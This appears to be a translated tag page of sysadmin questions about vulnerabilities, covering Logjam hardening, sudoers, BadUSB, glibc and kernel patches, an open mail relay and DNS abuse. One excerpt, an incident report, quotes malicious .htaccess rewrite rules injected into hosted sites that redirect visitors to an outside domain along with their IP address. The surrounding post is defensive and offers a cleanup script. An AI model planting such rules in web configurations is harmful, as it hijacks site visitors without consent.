标签: vulnerability

最近，Diffie-Hellman 中的一个新漏洞（非正式地称为“logjam”）已经发布，为此页面已汇总，建议如何应对该漏洞：

我们为正确部署 Diffie-Hellman for TLS 提供了三个建议：

1. 禁用导出密码套件。尽管现代浏览器不再支持导出套件，FREAK 和 Logjam 攻击允许中间人攻击者诱骗浏览器使用导出级加密，然后可以解密 TLS 连接。出口密码是 1990 年代政策的残余，该政策阻止了强大的加密协议从美国出口。没有现代客户依赖导出套件，禁用它们几乎没有缺点。
2. 部署（临时）椭圆曲线 Diffie-Hellman (ECDHE)。椭圆曲线 Diffie-Hellman (ECDH) 密钥交换避免了所有已知的可行密码分析攻击，并且现代 Web 浏览器现在更喜欢 ECDHE，而不是原始的有限域 Diffie-Hellman。我们用来攻击标准 Diffie-Hellman 组的离散对数算法没有从预计算中获得如此强大的优势，并且单个服务器不需要生成唯一的椭圆曲线。
3. 生成一个强大的、独特的 Diffie Hellman 组。数百万台服务器使用几个固定组，这使它们成为预计算和潜在窃听的最佳目标。管理员应该为每个网站或服务器使用“安全”素数生成唯一的、2048 位或更强大的 Diffie-Hellman 组。

根据上述建议，我应该采取哪些最佳实践步骤来保护我的服务器？

在 sudoers 文件中添加此命令是否安全？

mike ALL= NOPASSWD:/bin/chown -R www-data\:www-data /var/www

这是我想运行的唯一命令

$mike@ubuntu: sudo chown -R www-data:www-data /var/www

谢谢你。

有消息称，一个unpatchable和不可修复USB固件开发是“在那里”。

这似乎与服务器无关，但由于Phison 受影响的硬件未公开，因此连接到内部网络的设备有可能被感染或潜在易受攻击。对于网络和系统管理员、ICT 顾问等来说，这可能是最糟糕的噩梦。

有没有办法检查USB设备是否存在潜在的BadUSB漏洞，以便USB设备可以“被IT部门审查”？

此漏洞是在 glibc 中发现的，有关详细信息，请参阅此黑客新闻帖子。

如debian bug tracker 中所述，该漏洞已在测试中修补且不稳定。

我想尽早修补它，所以是否可以从这些版本之一安装修补包，如果是，我该怎么做？

我们经营着一个托管大约 300 个网站的网络服务器群。

昨天早上，一个脚本将 www-data（apache 用户）拥有的 .htaccess 文件放置在大多数（但不是全部）站点的 document_root 下的每个目录中。

.htaccess 文件的内容是这样的：

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

谷歌搜索那个 url（这是“防病毒”的 md5 哈希）我发现同样的事情发生在整个互联网上，我正在寻找已经处理过这个问题的人，并确定了漏洞在哪里。

我已经搜索了我们的大部分日志，但还没有找到任何结论。有没有其他人经历过同样的事情，比我在查明漏洞方面做得更进一步？

到目前为止，我们已经确定：

• 这些更改是作为 www-data 进行的，因此 apache 或其插件可能是罪魁祸首
• 所有的更改都是在 15 分钟内完成的，所以它可能是自动化的
• 由于我们的网站具有广泛不同的域名，我认为一个站点上的单个漏洞是有责任的（而不是每个站点上的常见漏洞）
• 如果一个 .htaccess 文件已经存在并且可以被 www-data 写入，那么该脚本是友好的，只需将上述行附加到文件的末尾（使其易于反转）

任何更多提示将不胜感激。

==编辑==

对于那些需要它的人，这里是我用来清理 .htaccess 文件的脚本：

#!/bin/bash
PATT=84f6a4eef61784b33e4acbd32c8fdd72.com
DIR=/mnt
TMP=/tmp/`mktemp "XXXXXX"`
find $DIR -name .htaccess|while read FILE; do
  if ( grep $PATT "$FILE" > /dev/null); then
    if [ `cat "$FILE"|wc -l` -eq …

尝试修补 CVE-2014-0196 漏洞但 yum 找不到软件包更新

CentOS 6.5（最终版）面板版本：11.0.9 更新 #61

# uname -r
2.6.32-358.11.1.el6.x86_64

# yum update kernel
Loaded plugins: fastestmirror
Determining fastest mirrors
epel/metalink                                                                   |  23 kB     00:00    
epel: mirror.fraunhofer.de
base                                                                            | 3.7 kB     00:00    
epel                                                                            | 4.4 kB     00:00    
epel/primary_db                                                                 | 6.2 MB     00:00    
extras                                                                          | 3.4 kB     00:00    
updates                                                                         | 3.4 kB     00:00    
updates/primary_db                                                              | 3.7 MB     00:00    
Setting up Update Process
No Packages marked for Update

编辑 1

# rpm -q kernel
kernel-2.6.32-358.6.2.el6.x86_64
kernel-2.6.32-358.11.1.el6.x86_64
kernel-2.6.32-431.20.3.el6.x86_64

编辑 2 …

在过去的几年里，我的小型企业运行了一个电子邮件服务器，没有出现任何问题。

现在我的公司已经发展壮大，我想添加一些冗余，并添加了一个故障转移电子邮件服务器，前面有一个负载均衡器（haproxy）。

一切都很顺利，直到 1 周前我们成为垃圾邮件发送者的受害者，我不得不关闭所有功能。经常使用谷歌，我发现没有正确配置的负载均衡器会将我的后缀转换为开放中继。

我想解决这个问题，也找到了很多文档，但坦率地说，现在我有点迷失了。我知道我必须在 haproxy.cfg 中添加 send-proxy 以及其他更改，但我只是不知道如何添加 postscreen 以便再次强化 postfix。

谁能指导我，或者至少给我一些我没有找到的手册或教程的链接，以说明如何实现这一点？

我承认我在 postfix 官方文档中迷失了方向。

提前谢谢了

我最近在我的 Windows Server 2008 R2 上收到了一份审核报告，但由于错误/漏洞而失败：Microsoft asp.net ms-dos 设备名称 DoS www (443/tcp)。

我还没有找到任何解决方案来修复此漏洞，因为谷歌的解决方案中没有一个建议如何准确使用 ISAPI 过滤器来阻止来自具有 msdos 设备名称的 URL 的所有请求，因为审计报告中没有提到这样的特定字符串。是否应该向 ISAPI 过滤器添加一个字符串来阻止所有此类请求来解决此漏洞？

任何快速帮助将不胜感激！

问候

今天早上我们的服务器（windows 2008 R2 服务器，完全打补丁）有点慢。

检查网络活动，我发现几个 DNS 会话使用了大量带宽（每个会话 10MB/秒）。这很可疑（我希望 DNS 流量很小）所以我暂时关闭了 DNS。

这是一些连接的图像：

如您所见，主机列表多种多样。这是 DNS 中的漏洞吗？

我们的网站服务器最近经常被黑客入侵。我该如何保护它

我刚刚安装了新的 ubuntu 服务器并发出netstat -nlp命令并得到以下结果：

Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     8767     883/acpid           /var/run/acpid.socket
unix  2      [ ACC ]     STREAM     LISTENING     6935     1/init              @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     7281     377/dbus-daemon     /var/run/dbus/system_bus_socket
unix  2      [ ACC ]     SEQPACKET  LISTENING     7149     315/udevd           /run/udev/control

我应该关闭这些端口来修复服务器漏洞吗？